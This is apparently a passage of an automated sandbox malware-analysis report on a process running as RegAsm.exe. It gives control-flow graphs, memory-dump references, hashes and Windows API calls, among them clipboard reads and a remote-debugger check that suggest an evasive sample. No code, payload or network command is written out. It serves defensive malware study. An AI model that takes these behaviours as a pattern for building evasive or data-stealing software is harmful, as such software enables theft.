                                                                        control_flow_graph 1316 6e6de18-6e6de7e 1317 6e6de80-6e6de86 1316->1317 1318 6e6de89-6e6de90 1316->1318 1317->1318 1319 6e6de92-6e6de98 1318->1319 1320 6e6de9b-6e6ded3 1318->1320 1319->1320 1321 6e6dedb-6e6df3a CreateWindowExW 1320->1321 1322 6e6df43-6e6df7b 1321->1322 1323 6e6df3c-6e6df42 1321->1323 1327 6e6df7d-6e6df80 1322->1327 1328 6e6df88 1322->1328 1323->1322 1327->1328 1329 6e6df89 1328->1329 1329->1329
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E6DF2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 357d46817500564abe77e25a91c5ab8eb1a6130ea70f5af3dfc743a5847c1a13
                                                                        • Instruction ID: e8d1942b0db6d0e36cac81cc136f5ceb4110eb2db1a70eba4b679bbbe3e52680
                                                                        • Opcode Fuzzy Hash: 357d46817500564abe77e25a91c5ab8eb1a6130ea70f5af3dfc743a5847c1a13
                                                                        • Instruction Fuzzy Hash: 7241B0B1D003099FDB14CF9AD884ADEFBB5FF48354F64852AE419AB210D774A985CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 1330 160e090-160e0cc 1331 160e0d2-160e0d7 1330->1331 1332 160e17c-160e19c 1330->1332 1333 160e0d9-160e110 1331->1333 1334 160e12a-160e162 CallWindowProcW 1331->1334 1338 160e19f-160e1ac 1332->1338 1341 160e112-160e118 1333->1341 1342 160e119-160e128 1333->1342 1335 160e164-160e16a 1334->1335 1336 160e16b-160e17a 1334->1336 1335->1336 1336->1338 1341->1342 1342->1338
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0160E151
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 12e678be0dc2c717596e8556f782328139cddd77f74a924cdf199c9c39d03e2a
                                                                        • Instruction ID: c04b12e08a70ddfeaf015dae6016780716104d53661cc0b6dc2e1f9f3dcd36f5
                                                                        • Opcode Fuzzy Hash: 12e678be0dc2c717596e8556f782328139cddd77f74a924cdf199c9c39d03e2a
                                                                        • Instruction Fuzzy Hash: F4413AB4900305CFDB19CF99C848AABBBF5FF88314F248999D518A7361D335A841CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 1344 160edcc-160ee28 1346 160ee32-160ee70 OleGetClipboard 1344->1346 1347 160ee72-160ee78 1346->1347 1348 160ee79-160eec7 1346->1348 1347->1348 1353 160eed7 1348->1353 1354 160eec9-160eecd 1348->1354 1357 160eed8 1353->1357 1354->1353 1355 160eecf-160eed2 call 1600ab8 1354->1355 1355->1353 1357->1357
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        • Opcode ID: 54f83a8f6e867299dc8bddbfb732ca5d80b4be2ad40ca0d86c2bfd66f5df8350
                                                                        • Instruction ID: 43dd60aaee6e981a3ee5338b1baa2e3369dfcaa7cefa36edc730e219fe07c110
                                                                        • Opcode Fuzzy Hash: 54f83a8f6e867299dc8bddbfb732ca5d80b4be2ad40ca0d86c2bfd66f5df8350
                                                                        • Instruction Fuzzy Hash: 8D3112B0D01258DFDB14CF99C944BDEBBF5AF48304F248829E504AB390D7756945CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 1358 160e830-160ee70 OleGetClipboard 1361 160ee72-160ee78 1358->1361 1362 160ee79-160eec7 1358->1362 1361->1362 1367 160eed7 1362->1367 1368 160eec9-160eecd 1362->1368 1371 160eed8 1367->1371 1368->1367 1369 160eecf-160eed2 call 1600ab8 1368->1369 1369->1367 1371->1371
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        • Opcode ID: 07274e2d70d4850246c231c35f9c88102cb80df6960a5e6977471b6dc08bab72
                                                                        • Instruction ID: 35ecc99c3113c3441c03b6e374ac6e25db72d887fa20e4d7dc79a87ec3612b2a
                                                                        • Opcode Fuzzy Hash: 07274e2d70d4850246c231c35f9c88102cb80df6960a5e6977471b6dc08bab72
                                                                        • Instruction Fuzzy Hash: 623100B0D0125CDFDB18CF99C984B9EBBF5AF48304F24842AE504BB390D7B56945CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 1372 1607ecb-1607f54 CheckRemoteDebuggerPresent 1374 1607f56-1607f5c 1372->1374 1375 1607f5d-1607f98 1372->1375 1374->1375
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 01607F47
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 9be52ddc6a5ce9ebe2e579f5cb42feaded0f368a96f9dcd60ded896752521e59
                                                                        • Instruction ID: d7125b55bb83e8559dae86ade760dca3ff3f104162baeccfdd67146a2c7dc7ce
                                                                        • Opcode Fuzzy Hash: 9be52ddc6a5ce9ebe2e579f5cb42feaded0f368a96f9dcd60ded896752521e59
                                                                        • Instruction Fuzzy Hash: 702148B18012598FDB14CF9AD884BEEFBF4EF49320F14845AE458A7350D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E6F957
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 3e080836d00080c3101f2845b3de2bdbc5ce1598cf569b4498ca2a7bc65c3391
                                                                        • Instruction ID: edb68302613a2c1d7d478fbcc56b087ce997c33c0f03b9d56d0dbe22c389ebec
                                                                        • Opcode Fuzzy Hash: 3e080836d00080c3101f2845b3de2bdbc5ce1598cf569b4498ca2a7bc65c3391
                                                                        • Instruction Fuzzy Hash: 3921F6B5D00248AFDB10CFAAD984ADEBFF5EB49310F14845AE954A3310C374A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E6F957
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: e387ae3525039262843eaf67162a6820920f1237f57a4b18ca9bba3ece6bf9a3
                                                                        • Instruction ID: 4495730b846c7cffe555b984535ac7e62cbbd39ce2d0c603ee1cafb13a08df74
                                                                        • Opcode Fuzzy Hash: e387ae3525039262843eaf67162a6820920f1237f57a4b18ca9bba3ece6bf9a3
                                                                        • Instruction Fuzzy Hash: 4321C6B5D00249AFDB10CF9AD984ADEFBF5EB48314F14841AE918B3310D378A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06E6CDD6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 931c604c88d9fbe0bed31ca38aeb77b8520e17f9ce84aa9de561f8115c66655d
                                                                        • Instruction ID: 0468ab9c2902b0fdef2868db41bb040873e1b3c99fe9b18301f373c2efb4d473
                                                                        • Opcode Fuzzy Hash: 931c604c88d9fbe0bed31ca38aeb77b8520e17f9ce84aa9de561f8115c66655d
                                                                        • Instruction Fuzzy Hash: 2D1112B5C007498FDB10DF9AC844ADEFBF8EF89714F10842AD458A3200C379A545CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06E6CDD6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 0b799ccdb55902e29e61ef9529cddfd38fa05037e7f54cd71d0841a95724ed3c
                                                                        • Instruction ID: c8f2c8d1abdec86e4a169054104845433d51f8a50ddc74cde06ca32ee50cf946
                                                                        • Opcode Fuzzy Hash: 0b799ccdb55902e29e61ef9529cddfd38fa05037e7f54cd71d0841a95724ed3c
                                                                        • Instruction Fuzzy Hash: 17111FB2C007498BDB10DF9AC844ADEFBF4EB89614F20842AE558B7200C378A545CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0160ECE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: c5bae7d0d38953554a9e7e8fc7b6417af1725ec0ccfc58c96d20a60aaf5150ec
                                                                        • Instruction ID: 07ea76dd8e6f8f688cf2b9b6f9c8adfb3da1cb665d6be58cc9306e0d23f14f0b
                                                                        • Opcode Fuzzy Hash: c5bae7d0d38953554a9e7e8fc7b6417af1725ec0ccfc58c96d20a60aaf5150ec
                                                                        • Instruction Fuzzy Hash: F11133B18002488FDB20DF9AD944BDEFFF8EB49324F20881AD558A3300C379A944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,3006D315), ref: 0160E427
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: ba2f401ea95a2e7c387073f1097b61f28874e85ed49b90a10d24b999ca6f7896
                                                                        • Instruction ID: 29566326204b2d6d015c6b8d855c2b399cd0c08d35f83313fc4d9ff08cae7078
                                                                        • Opcode Fuzzy Hash: ba2f401ea95a2e7c387073f1097b61f28874e85ed49b90a10d24b999ca6f7896
                                                                        • Instruction Fuzzy Hash: E211F2B58002598FDB10DF9AD844BDEFBF8EB49324F20885AD558A3240C779A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0160ECE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: f7c4ea12099cd605ff6ce468e8b31bcbc81db62444ab8dcf11d88b54711bfe8b
                                                                        • Instruction ID: d852b6812ac5cafb4b8a756ef2e2c19ed45852e23503377f5f0e8c3347e4ba59
                                                                        • Opcode Fuzzy Hash: f7c4ea12099cd605ff6ce468e8b31bcbc81db62444ab8dcf11d88b54711bfe8b
                                                                        • Instruction Fuzzy Hash: 5C1133B18007488FDB20DF9AC948B9EBBF8EB48324F10881AD518A3300C379A944CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,3006D315), ref: 0160E427
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: bd13046ad5e565b4f105ccf37a0310f469e4bbbd7f651ca8c40bd88f492d8392
                                                                        • Instruction ID: 54528c9895f08cb7346be4acce78121b29225f15acccdf2983db00f706a6c0d2
                                                                        • Opcode Fuzzy Hash: bd13046ad5e565b4f105ccf37a0310f469e4bbbd7f651ca8c40bd88f492d8392
                                                                        • Instruction Fuzzy Hash: E31112B18002488FDB10DF9AD844BDEFBF8EB49324F20881AD518A3340C779A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4464819423.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_14cd000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1170b061e58305b12ae96ade86efce43ac4ab93b3d2fccef4fc74baba0057f4
                                                                        • Instruction ID: b771bd8cf2c1a196bf104160041028234e86ddd303fb44a192218241de325751
                                                                        • Opcode Fuzzy Hash: b1170b061e58305b12ae96ade86efce43ac4ab93b3d2fccef4fc74baba0057f4
                                                                        • Instruction Fuzzy Hash: E92145B8904200DFCB55DF58C9C0B22BB64EB84718F20C57ED8090B362C33AD407CAA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4464819423.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_14cd000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54f7a12d76734a3bcbe0394983a6f82300feb4c8c6d29d2cfc5a0dc2ebd507d9
                                                                        • Instruction ID: b2ce34d7e66e6161f6ad562ee082116fc93a5152ea9260dbb9c9537729c03c55
                                                                        • Opcode Fuzzy Hash: 54f7a12d76734a3bcbe0394983a6f82300feb4c8c6d29d2cfc5a0dc2ebd507d9
                                                                        • Instruction Fuzzy Hash: FB216D755093C08FDB13CF64C990711BF71AB46214F29C5EBC8898F6A7C23A980ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%